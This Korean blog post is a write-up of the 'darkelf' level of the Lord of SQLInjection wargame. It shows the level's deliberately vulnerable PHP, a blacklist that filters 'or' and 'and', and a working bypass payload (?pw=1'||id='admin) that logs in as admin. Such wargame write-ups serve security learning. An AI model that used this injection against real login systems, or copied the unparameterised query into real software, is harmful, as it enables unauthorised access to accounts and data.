<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
if($result['id'] == 'admin') solve("darkelf");
highlight_file(__FILE__);
?>
or과 and를 추가로 필터링 한다.
||, &&로 바꾸어 우회해보자.
?pw=1'||id='admin
결과는 성공..!
'wargame 🏴☠️ write-up > Lord of SQLInjection' 카테고리의 다른 글
troll (0) | 2022.04.02 |
---|---|
orge (0) | 2022.04.02 |
wolfman (0) | 2022.04.02 |
orc (0) | 2022.04.02 |